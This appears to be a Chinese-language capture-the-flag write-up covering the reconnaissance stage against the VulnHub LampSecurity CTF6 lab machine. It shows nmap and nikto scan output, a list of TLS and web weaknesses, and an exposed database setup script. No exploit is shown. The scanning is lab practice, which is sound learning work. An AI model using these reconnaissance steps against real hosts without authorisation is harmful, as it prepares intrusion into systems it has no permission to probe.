信息收集

nmap

主机发现

┌──(kali㉿kali)-[~/vulnhub/LampSecurity/ctf6/workSpace]
└─$ sudo nmap -sn 192.168.56.0/24         
[sudo] password for kali: 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-28 11:02 CST
Nmap scan report for 192.168.56.1
Host is up (0.00020s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.56.2
Host is up (0.00023s latency).
MAC Address: 00:50:56:EC:CE:9E (VMware)
Nmap scan report for 192.168.56.140
Host is up (0.00046s latency).
MAC Address: 00:0C:29:5C:75:70 (VMware)
Nmap scan report for 192.168.56.254
Host is up (0.00021s latency).
MAC Address: 00:50:56:FE:21:A5 (VMware)
Nmap scan report for 192.168.56.132
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 4.06 seconds

端口扫描

┌──(kali㉿kali)-[~/vulnhub/LampSecurity/ctf6/workSpace]
└─$ sudo nmap -p- --min-rate=10000 192.168.56.140
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-28 11:03 CST
Nmap scan report for 192.168.56.140
Host is up (0.0026s latency).
Not shown: 65525 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
110/tcp  open  pop3
111/tcp  open  rpcbind
143/tcp  open  imap
443/tcp  open  https
624/tcp  open  cryptoadmin
993/tcp  open  imaps
995/tcp  open  pop3s
3306/tcp open  mysql
MAC Address: 00:0C:29:5C:75:70 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 5.68 seconds

UDP端口扫描

┌──(kali㉿kali)-[~/vulnhub/LampSecurity/ctf6/workSpace]
└─$ sudo nmap -sU -p- --min-rate=10000 192.168.56.140
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-28 11:06 CST
Warning: 192.168.56.140 giving up on port because retransmission cap hit (10).
Stats: 0:00:37 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 52.44% done; ETC: 11:08 (0:00:34 remaining)
Nmap scan report for 192.168.56.140
Host is up (0.0026s latency).
Not shown: 65453 open|filtered udp ports (no-response), 81 closed udp ports (port-unreach)
PORT    STATE SERVICE
111/udp open  rpcbind
MAC Address: 00:0C:29:5C:75:70 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 72.95 seconds

TCP扫描，服务识别，OS识别

┌──(kali㉿kali)-[~/vulnhub/LampSecurity/ctf6/workSpace]
└─$ sudo nmap -sT -sV -O -p22,80,110,111,143,443,624,993,995,3306 192.168.56.140
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-28 11:08 CST
Nmap scan report for 192.168.56.140
Host is up (0.00049s latency).

PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 4.3 (protocol 2.0)
80/tcp   open  http     Apache httpd 2.2.3 ((CentOS))
110/tcp  open  pop3     Dovecot pop3d
111/tcp  open  rpcbind  2 (RPC #100000)
143/tcp  open  imap     Dovecot imapd
443/tcp  open  ssl/http Apache httpd 2.2.3 ((CentOS))
624/tcp  open  status   1 (RPC #100024)
993/tcp  open  ssl/imap Dovecot imapd
995/tcp  open  ssl/pop3 Dovecot pop3d
3306/tcp open  mysql    MySQL 5.0.45
MAC Address: 00:0C:29:5C:75:70 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.60 seconds

可用信息很多。反正还是先从80看起吧。

漏洞扫描

┌──(kali㉿kali)-[~/vulnhub/LampSecurity/ctf6/workSpace]
└─$ sudo nmap --script=vuln 192.168.56.140                                      
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-28 11:10 CST
Nmap scan report for 192.168.56.140
Host is up (0.0028s latency).
Not shown: 991 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
| http-enum: 
|   /mail/: Mail folder
|   /logs/: Logs (401 Authorization Required)
|   /phpmyadmin/: phpMyAdmin
|   /css/: Potentially interesting directory w/ listing on 'apache/2.2.3 (centos)'
|   /docs/: Potentially interesting directory w/ listing on 'apache/2.2.3 (centos)'
|   /files/: Potentially interesting directory w/ listing on 'apache/2.2.3 (centos)'
|   /icons/: Potentially interesting directory w/ listing on 'apache/2.2.3 (centos)'
|   /inc/: Potentially interesting directory w/ listing on 'apache/2.2.3 (centos)'
|   /js/: Potentially interesting directory w/ listing on 'apache/2.2.3 (centos)'
|   /lib/: Potentially interesting directory w/ listing on 'apache/2.2.3 (centos)'
|   /manual/: Potentially interesting folder
|   /sql/: Potentially interesting directory w/ listing on 'apache/2.2.3 (centos)'
|_  /templates/: Potentially interesting directory w/ listing on 'apache/2.2.3 (centos)'
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.56.140
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.56.140:80/?action=login
|     Form id: 
|     Form action: ?action=login
|     
|     Path: http://192.168.56.140:80/mail/
|     Form id: rcmlogintz
|_    Form action: ./
|_http-trace: TRACE is enabled
110/tcp  open  pop3
| ssl-dh-params: 
|   VULNERABLE:
|   Anonymous Diffie-Hellman Key Exchange MitM Vulnerability
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use anonymous
|       Diffie-Hellman key exchange only provide protection against passive
|       eavesdropping, and are vulnerable to active man-in-the-middle attacks
|       which could completely compromise the confidentiality and integrity
|       of any data exchanged over the resulting session.
|     Check results:
|       ANONYMOUS DH GROUP 1
|             Cipher Suite: TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: Unknown/Custom-generated
|             Modulus Length: 512
|             Generator Length: 8
|             Public Key Length: 512
|     References:
|       https://www.ietf.org/rfc/rfc2246.txt
|   
|   Transport Layer Security (TLS) Protocol DHE_EXPORT Ciphers Downgrade MitM (Logjam)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2015-4000  BID:74733
|       The Transport Layer Security (TLS) protocol contains a flaw that is
|       triggered when handling Diffie-Hellman key exchanges defined with
|       the DHE_EXPORT cipher. This may allow a man-in-the-middle attacker
|       to downgrade the security of a TLS session to 512-bit export-grade
|       cryptography, which is significantly weaker, allowing the attacker
|       to more easily break the encryption and monitor or tamper with
|       the encrypted stream.
|     Disclosure date: 2015-5-19
|     Check results:
|       EXPORT-GRADE DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: Unknown/Custom-generated
|             Modulus Length: 512
|             Generator Length: 8
|             Public Key Length: 512
|     References:
|       https://weakdh.org
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4000
|       https://www.securityfocus.com/bid/74733
|   
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use Diffie-Hellman groups
|       of insufficient strength, especially those using one of a few commonly
|       shared groups, may be susceptible to passive eavesdropping attacks.
|     Check results:
|       WEAK DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: Unknown/Custom-generated
|             Modulus Length: 1024
|             Generator Length: 8
|             Public Key Length: 1024
|     References:
|_      https://weakdh.org
| ssl-ccs-injection: 
|   VULNERABLE:
|   SSL/TLS MITM vulnerability (CCS Injection)
|     State: VULNERABLE
|     Risk factor: High
|       OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
|       does not properly restrict processing of ChangeCipherSpec messages,
|       which allows man-in-the-middle attackers to trigger use of a zero
|       length master key in certain OpenSSL-to-OpenSSL communications, and
|       consequently hijack sessions or obtain sensitive information, via
|       a crafted TLS handshake, aka the "CCS Injection" vulnerability.
|           
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
|       http://www.cvedetails.com/cve/2014-0224
|_      http://www.openssl.org/news/secadv_20140605.txt
|_sslv2-drown: ERROR: Script execution failed (use -d to debug)
| ssl-poodle: 
|   VULNERABLE:
|   SSL POODLE information leak
|     State: VULNERABLE
|     IDs:  CVE:CVE-2014-3566  BID:70574
|           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
|           products, uses nondeterministic CBC padding, which makes it easier
|           for man-in-the-middle attackers to obtain cleartext data via a
|           padding-oracle attack, aka the "POODLE" issue.
|     Disclosure date: 2014-10-14
|     Check results:
|       TLS_RSA_WITH_AES_128_CBC_SHA
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
|       https://www.imperialviolet.org/2014/10/14/poodle.html
|       https://www.openssl.org/~bodo/ssl-poodle.pdf
|_      https://www.securityfocus.com/bid/70574
111/tcp  open  rpcbind
143/tcp  open  imap
| ssl-ccs-injection: 
|   VULNERABLE:
|   SSL/TLS MITM vulnerability (CCS Injection)
|     State: VULNERABLE
|     Risk factor: High
|       OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
|       does not properly restrict processing of ChangeCipherSpec messages,
|       which allows man-in-the-middle attackers to trigger use of a zero
|       length master key in certain OpenSSL-to-OpenSSL communications, and
|       consequently hijack sessions or obtain sensitive information, via
|       a crafted TLS handshake, aka the "CCS Injection" vulnerability.
|           
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
|       http://www.cvedetails.com/cve/2014-0224
|_      http://www.openssl.org/news/secadv_20140605.txt
|_sslv2-drown: ERROR: Script execution failed (use -d to debug)
| ssl-dh-params: 
|   VULNERABLE:
|   Anonymous Diffie-Hellman Key Exchange MitM Vulnerability
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use anonymous
|       Diffie-Hellman key exchange only provide protection against passive
|       eavesdropping, and are vulnerable to active man-in-the-middle attacks
|       which could completely compromise the confidentiality and integrity
|       of any data exchanged over the resulting session.
|     Check results:
|       ANONYMOUS DH GROUP 1
|             Cipher Suite: TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: Unknown/Custom-generated
|             Modulus Length: 512
|             Generator Length: 8
|             Public Key Length: 512
|     References:
|       https://www.ietf.org/rfc/rfc2246.txt
|   
|   Transport Layer Security (TLS) Protocol DHE_EXPORT Ciphers Downgrade MitM (Logjam)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2015-4000  BID:74733
|       The Transport Layer Security (TLS) protocol contains a flaw that is
|       triggered when handling Diffie-Hellman key exchanges defined with
|       the DHE_EXPORT cipher. This may allow a man-in-the-middle attacker
|       to downgrade the security of a TLS session to 512-bit export-grade
|       cryptography, which is significantly weaker, allowing the attacker
|       to more easily break the encryption and monitor or tamper with
|       the encrypted stream.
|     Disclosure date: 2015-5-19
|     Check results:
|       EXPORT-GRADE DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: Unknown/Custom-generated
|             Modulus Length: 512
|             Generator Length: 8
|             Public Key Length: 512
|     References:
|       https://weakdh.org
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4000
|       https://www.securityfocus.com/bid/74733
|   
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use Diffie-Hellman groups
|       of insufficient strength, especially those using one of a few commonly
|       shared groups, may be susceptible to passive eavesdropping attacks.
|     Check results:
|       WEAK DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: Unknown/Custom-generated
|             Modulus Length: 1024
|             Generator Length: 8
|             Public Key Length: 1024
|     References:
|_      https://weakdh.org
| ssl-poodle: 
|   VULNERABLE:
|   SSL POODLE information leak
|     State: VULNERABLE
|     IDs:  CVE:CVE-2014-3566  BID:70574
|           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
|           products, uses nondeterministic CBC padding, which makes it easier
|           for man-in-the-middle attackers to obtain cleartext data via a
|           padding-oracle attack, aka the "POODLE" issue.
|     Disclosure date: 2014-10-14
|     Check results:
|       TLS_RSA_WITH_AES_128_CBC_SHA
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
|       https://www.imperialviolet.org/2014/10/14/poodle.html
|       https://www.openssl.org/~bodo/ssl-poodle.pdf
|_      https://www.securityfocus.com/bid/70574
443/tcp  open  https
| ssl-poodle: 
|   VULNERABLE:
|   SSL POODLE information leak
|     State: VULNERABLE
|     IDs:  CVE:CVE-2014-3566  BID:70574
|           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
|           products, uses nondeterministic CBC padding, which makes it easier
|           for man-in-the-middle attackers to obtain cleartext data via a
|           padding-oracle attack, aka the "POODLE" issue.
|     Disclosure date: 2014-10-14
|     Check results:
|       TLS_RSA_WITH_AES_128_CBC_SHA
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
|       https://www.imperialviolet.org/2014/10/14/poodle.html
|       https://www.openssl.org/~bodo/ssl-poodle.pdf
|_      https://www.securityfocus.com/bid/70574
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| ssl-dh-params: 
|   VULNERABLE:
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use Diffie-Hellman groups
|       of insufficient strength, especially those using one of a few commonly
|       shared groups, may be susceptible to passive eavesdropping attacks.
|     Check results:
|       WEAK DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_WITH_DES_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: mod_ssl 2.2.x/1024-bit MODP group with safe prime modulus
|             Modulus Length: 1024
|             Generator Length: 8
|             Public Key Length: 1024
|     References:
|_      https://weakdh.org
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| ssl-ccs-injection: 
|   VULNERABLE:
|   SSL/TLS MITM vulnerability (CCS Injection)
|     State: VULNERABLE
|     Risk factor: High
|       OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
|       does not properly restrict processing of ChangeCipherSpec messages,
|       which allows man-in-the-middle attackers to trigger use of a zero
|       length master key in certain OpenSSL-to-OpenSSL communications, and
|       consequently hijack sessions or obtain sensitive information, via
|       a crafted TLS handshake, aka the "CCS Injection" vulnerability.
|           
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
|       http://www.cvedetails.com/cve/2014-0224
|_      http://www.openssl.org/news/secadv_20140605.txt
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.56.140
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: https://192.168.56.140:443/mail/
|     Form id: rcmlogintz
|     Form action: ./
|     
|     Path: https://192.168.56.140:443/?action=login
|     Form id: 
|     Form action: ?action=login
|     
|     Path: https://192.168.56.140:443/mail/?_task=mail
|     Form id: rcmlogintz
|_    Form action: ./
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|       secure flag not set and HTTPS in use
|_      httponly flag not set
|_http-trace: TRACE is enabled
|_http-phpself-xss: ERROR: Script execution failed (use -d to debug)
| http-enum: 
|   /mail/: Mail folder
|   /logs/: Logs (401 Authorization Required)
|   /phpmyadmin/: phpMyAdmin
|   /css/: Potentially interesting directory w/ listing on 'apache/2.2.3 (centos)'
|   /docs/: Potentially interesting directory w/ listing on 'apache/2.2.3 (centos)'
|   /files/: Potentially interesting directory w/ listing on 'apache/2.2.3 (centos)'
|   /icons/: Potentially interesting directory w/ listing on 'apache/2.2.3 (centos)'
|   /inc/: Potentially interesting directory w/ listing on 'apache/2.2.3 (centos)'
|   /js/: Potentially interesting directory w/ listing on 'apache/2.2.3 (centos)'
|   /lib/: Potentially interesting directory w/ listing on 'apache/2.2.3 (centos)'
|   /manual/: Potentially interesting folder
|   /sql/: Potentially interesting directory w/ listing on 'apache/2.2.3 (centos)'
|_  /templates/: Potentially interesting directory w/ listing on 'apache/2.2.3 (centos)'
993/tcp  open  imaps
|_sslv2-drown: ERROR: Script execution failed (use -d to debug)
| ssl-poodle: 
|   VULNERABLE:
|   SSL POODLE information leak
|     State: VULNERABLE
|     IDs:  CVE:CVE-2014-3566  BID:70574
|           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
|           products, uses nondeterministic CBC padding, which makes it easier
|           for man-in-the-middle attackers to obtain cleartext data via a
|           padding-oracle attack, aka the "POODLE" issue.
|     Disclosure date: 2014-10-14
|     Check results:
|       TLS_RSA_WITH_AES_128_CBC_SHA
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
|       https://www.imperialviolet.org/2014/10/14/poodle.html
|       https://www.openssl.org/~bodo/ssl-poodle.pdf
|_      https://www.securityfocus.com/bid/70574
| ssl-dh-params: 
|   VULNERABLE:
|   Anonymous Diffie-Hellman Key Exchange MitM Vulnerability
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use anonymous
|       Diffie-Hellman key exchange only provide protection against passive
|       eavesdropping, and are vulnerable to active man-in-the-middle attacks
|       which could completely compromise the confidentiality and integrity
|       of any data exchanged over the resulting session.
|     Check results:
|       ANONYMOUS DH GROUP 1
|             Cipher Suite: TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: Unknown/Custom-generated
|             Modulus Length: 512
|             Generator Length: 8
|             Public Key Length: 512
|     References:
|       https://www.ietf.org/rfc/rfc2246.txt
|   
|   Transport Layer Security (TLS) Protocol DHE_EXPORT Ciphers Downgrade MitM (Logjam)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2015-4000  BID:74733
|       The Transport Layer Security (TLS) protocol contains a flaw that is
|       triggered when handling Diffie-Hellman key exchanges defined with
|       the DHE_EXPORT cipher. This may allow a man-in-the-middle attacker
|       to downgrade the security of a TLS session to 512-bit export-grade
|       cryptography, which is significantly weaker, allowing the attacker
|       to more easily break the encryption and monitor or tamper with
|       the encrypted stream.
|     Disclosure date: 2015-5-19
|     Check results:
|       EXPORT-GRADE DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: Unknown/Custom-generated
|             Modulus Length: 512
|             Generator Length: 8
|             Public Key Length: 512
|     References:
|       https://weakdh.org
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4000
|       https://www.securityfocus.com/bid/74733
|   
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use Diffie-Hellman groups
|       of insufficient strength, especially those using one of a few commonly
|       shared groups, may be susceptible to passive eavesdropping attacks.
|     Check results:
|       WEAK DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: Unknown/Custom-generated
|             Modulus Length: 1024
|             Generator Length: 8
|             Public Key Length: 1024
|     References:
|_      https://weakdh.org
| ssl-ccs-injection: 
|   VULNERABLE:
|   SSL/TLS MITM vulnerability (CCS Injection)
|     State: VULNERABLE
|     Risk factor: High
|       OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
|       does not properly restrict processing of ChangeCipherSpec messages,
|       which allows man-in-the-middle attackers to trigger use of a zero
|       length master key in certain OpenSSL-to-OpenSSL communications, and
|       consequently hijack sessions or obtain sensitive information, via
|       a crafted TLS handshake, aka the "CCS Injection" vulnerability.
|           
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
|       http://www.cvedetails.com/cve/2014-0224
|_      http://www.openssl.org/news/secadv_20140605.txt
995/tcp  open  pop3s
|_sslv2-drown: ERROR: Script execution failed (use -d to debug)
| ssl-dh-params: 
|   VULNERABLE:
|   Anonymous Diffie-Hellman Key Exchange MitM Vulnerability
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use anonymous
|       Diffie-Hellman key exchange only provide protection against passive
|       eavesdropping, and are vulnerable to active man-in-the-middle attacks
|       which could completely compromise the confidentiality and integrity
|       of any data exchanged over the resulting session.
|     Check results:
|       ANONYMOUS DH GROUP 1
|             Cipher Suite: TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: Unknown/Custom-generated
|             Modulus Length: 512
|             Generator Length: 8
|             Public Key Length: 512
|     References:
|       https://www.ietf.org/rfc/rfc2246.txt
|   
|   Transport Layer Security (TLS) Protocol DHE_EXPORT Ciphers Downgrade MitM (Logjam)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2015-4000  BID:74733
|       The Transport Layer Security (TLS) protocol contains a flaw that is
|       triggered when handling Diffie-Hellman key exchanges defined with
|       the DHE_EXPORT cipher. This may allow a man-in-the-middle attacker
|       to downgrade the security of a TLS session to 512-bit export-grade
|       cryptography, which is significantly weaker, allowing the attacker
|       to more easily break the encryption and monitor or tamper with
|       the encrypted stream.
|     Disclosure date: 2015-5-19
|     Check results:
|       EXPORT-GRADE DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: Unknown/Custom-generated
|             Modulus Length: 512
|             Generator Length: 8
|             Public Key Length: 512
|     References:
|       https://weakdh.org
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4000
|       https://www.securityfocus.com/bid/74733
|   
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use Diffie-Hellman groups
|       of insufficient strength, especially those using one of a few commonly
|       shared groups, may be susceptible to passive eavesdropping attacks.
|     Check results:
|       WEAK DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: Unknown/Custom-generated
|             Modulus Length: 1024
|             Generator Length: 8
|             Public Key Length: 1024
|     References:
|_      https://weakdh.org
| ssl-poodle: 
|   VULNERABLE:
|   SSL POODLE information leak
|     State: VULNERABLE
|     IDs:  CVE:CVE-2014-3566  BID:70574
|           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
|           products, uses nondeterministic CBC padding, which makes it easier
|           for man-in-the-middle attackers to obtain cleartext data via a
|           padding-oracle attack, aka the "POODLE" issue.
|     Disclosure date: 2014-10-14
|     Check results:
|       TLS_RSA_WITH_AES_128_CBC_SHA
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
|       https://www.imperialviolet.org/2014/10/14/poodle.html
|       https://www.openssl.org/~bodo/ssl-poodle.pdf
|_      https://www.securityfocus.com/bid/70574
| ssl-ccs-injection: 
|   VULNERABLE:
|   SSL/TLS MITM vulnerability (CCS Injection)
|     State: VULNERABLE
|     Risk factor: High
|       OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
|       does not properly restrict processing of ChangeCipherSpec messages,
|       which allows man-in-the-middle attackers to trigger use of a zero
|       length master key in certain OpenSSL-to-OpenSSL communications, and
|       consequently hijack sessions or obtain sensitive information, via
|       a crafted TLS handshake, aka the "CCS Injection" vulnerability.
|           
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
|       http://www.cvedetails.com/cve/2014-0224
|_      http://www.openssl.org/news/secadv_20140605.txt
3306/tcp open  mysql
MAC Address: 00:0C:29:5C:75:70 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 167.11 seconds

虽然很长一串，但是很多关于SSL漏洞的重复信息，且多是用于中间人攻击的，我们暂时用不上。

nikto

然后我们再用nikto扫一扫漏洞看看有没有什么遗漏的。

┌──(kali㉿kali)-[~/vulnhub/LampSecurity/ctf6/workSpace]
└─$ sudo nikto -h 192.168.56.140          
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.56.140
+ Target Hostname:    192.168.56.140
+ Target Port:        80
+ Start Time:         2023-04-28 11:16:09 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.2.3 (CentOS)
+ /: Retrieved x-powered-by header: PHP/5.2.6.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /: Cookie PHPSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ Apache/2.2.3 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE .
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
+ /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive informia certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive informia certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive informia certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /css/: Directory indexing found.
+ /css/: This might be interesting.
+ /files/: Directory indexing found.
+ /files/: This might be interesting.
+ /lib/: Directory indexing found.
+ /lib/: This might be interesting.
+ /mail/: Cookie roundcube_sessid created without the httponly flag. See: https://deveozilla.org/en-US/docs/Web/HTTP/Cookies
+ /mail/: This might be interesting.
+ /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should beted or limited to authorized hosts.
+ /phpmyadmin/ChangeLog: Server may leak inodes via ETags, header found with file /php/ChangeLog, inode: 97164, size: 35791, mtime: Thu Oct 20 05:47:44 2095. See: http://cv.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ /phpmyadmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be proor limited to authorized hosts.
+ /sql/: Directory indexing found.
+ /manual/: Web server manual found.
+ /icons/: Directory indexing found.
+ /manual/images/: Directory indexing found.
+ /docs/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restraccess-to-iconsreadme/
+ /phpmyadmin/: phpMyAdmin directory found.
+ /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and shourotected or limited to authorized hosts.
+ /phpmyadmin/README: phpMyAdmin is for managing MySQL databases, and should be proteclimited to authorized hosts. See: https://typo3.org/
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 9060 requests: 0 error(s) and 32 item(s) reported on remote host
+ End Time:           2023-04-28 11:16:34 (GMT8) (25 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

manual web discoverd

看下来没有什么能get shell的漏洞。目前最值得看的是应该是他扫出来的这些网站目录，我们看看都有哪些内容。

/* http://192.168.56.140/sql/db.sql */
CREATE database IF NOT EXISTS cms;

use mysql;

GRANT ALL PRIVILEGES ON cms.* to 'sql_account'@'localhost' IDENTIFIED BY 'sql_password';

use cms;

DROP TABLE IF EXISTS user;
DROP TABLE IF EXISTS event;
DROP TABLE IF EXISTS log;

CREATE TABLE IF NOT EXISTS user (
	user_id int not null auto_increment primary key,
	user_username varchar(50) not null,
	user_password varchar(32) not null
);

CREATE TABLE IF NOT EXISTS event (
	event_id int not null auto_increment primary key,
	event_title varchar(255) not null,
	event_body text,
	event_file varchar(255) default null,
	user_id int not null,
	event_hits int default 0
);

CREATE TABLE IF NOT EXISTS log (
	log_id int not null auto_increment primary key,
	log_ip varchar(20),
	log_referer varchar(255),
	log_useragent varchar(255)
);

DELETE FROM user;
DELETE FROM event;
DELETE FROM log;

